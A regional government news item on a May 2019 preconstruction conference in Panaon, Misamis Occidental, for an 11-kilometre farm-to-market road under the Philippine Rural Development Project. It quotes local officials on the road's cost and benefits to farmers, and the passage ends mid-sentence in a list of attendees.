The Local Government Unit (LGU) of Panaon is up for a bigger project after the Department of Agriculture – Philippine Rural Development Project – 10 (DA-PRDP 10) conducted a Preconstruction Conference for the Rehabilitation and Concreting of Sumasap – Salimpono – Magsaysay – Bangko – San Juan Farm to Market Road (FMR) on May 31, 2019 at the Municipal Hall of Panaon, Misamis Occidental.

The successful turnover of the 2.095km Sumasap-San Roque farm- to-market road in the municipality of Panaon last year had provided so much relief to the residents that further encourage the local officials headed by Mayor Francisco T. Paylaga, Jr. to avail of a much bigger project. The mayor expressed his gratitude to DA-PRDP on the approval of the new project that will surely help alleviate the lives not just of the farmers, but the whole community as well.

In his message, Carlene C. Collado, CPA, OIC-Regional Director of DA-10 and Project Head of PRDP 10, challenged the contractor to do their job well and even finish the subproject before the allotted time since the FMR plays an important role not just to the LGUs, but mostly to the farmers and residents. He also added that the LGU Panaon together with the barangay officials benefiting from the FMR should be observant towards the construction process considering its emerging benefits making it their legacy in serving the community.

On the other hand, Engr. Ron T. Pingki-an, Municipal Engineer of Panaon and the Project Engineer of the upcoming FMR, said in an interview that the road is significant to boost the livelihood, provide accessibility, and convenience to the residents and farmers of benefiting barangays and its neighboring barangays. He also said that this FMR subproject will definitely help in the development of Panaon as a whole.

The 11.187km FMR with a total cost of Php 144,194,824.00 having an agricultural area of 2,822 hectares will serve the residents especially the farmers of rice, corn, coconut, banana, rubber, cassava, and lanzones.

Joining the preconstruction conference were Engr. Danessa N.
